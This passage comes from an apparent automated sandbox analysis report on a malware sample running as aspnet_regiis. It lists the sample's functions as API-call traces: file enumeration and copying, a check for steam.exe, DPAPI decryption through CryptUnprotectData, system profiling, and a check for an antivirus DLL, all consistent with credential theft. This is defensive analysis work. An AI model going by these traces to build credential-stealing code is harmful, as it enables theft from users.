                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0040B780
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0040B8FF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3801961486-0
                                                                                                                                                                    • Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                                                                    • Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
                                                                                                                                                                    • Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
                                                                                                                                                                    • Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9
                                                                                                                                                                    Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004124E4
                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                    • String ID: steam.exe
                                                                                                                                                                    • API String ID: 1799959500-2826358650
                                                                                                                                                                    • Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                                                                    • Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
                                                                                                                                                                    • Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                                                                    • Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15
                                                                                                                                                                    Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                    • String ID: /
                                                                                                                                                                    • API String ID: 507856799-4001269591
                                                                                                                                                                    • Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                                                                    • Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
                                                                                                                                                                    • Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                                                                    • Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54
                                                                                                                                                                    Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1799959500-0
                                                                                                                                                                    • Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                                                                    • Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
                                                                                                                                                                    • Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25
                                                                                                                                                                    Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                                                                    • LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                    • String ID: DPAPI
                                                                                                                                                                    • API String ID: 2068576380-1690256801
                                                                                                                                                                    • Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                                                                                    • Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
                                                                                                                                                                    • Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90
                                                                                                                                                                    Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 907984538-0
                                                                                                                                                                    • Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                                                                    • Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                                                                    • Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69
                                                                                                                                                                    Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                                                                    • wsprintfA.USER32 ref: 00410D7D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 362916592-0
                                                                                                                                                                    • Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                                                                                    • Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
                                                                                                                                                                    • Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                                                                                    • Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785
                                                                                                                                                                    Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                                    • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateNameProcessUser
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1296208442-0
                                                                                                                                                                    • Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                                                                    • Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
                                                                                                                                                                    • Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                                                                    • Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34
                                                                                                                                                                    Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoSystemwsprintf
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2452939696-0
                                                                                                                                                                    • Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                                                                                    • Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
                                                                                                                                                                    • Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                                                                                    • Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44
                                                                                                                                                                    Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcmpi
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1586166983-0
                                                                                                                                                                    • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                                                                    • Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
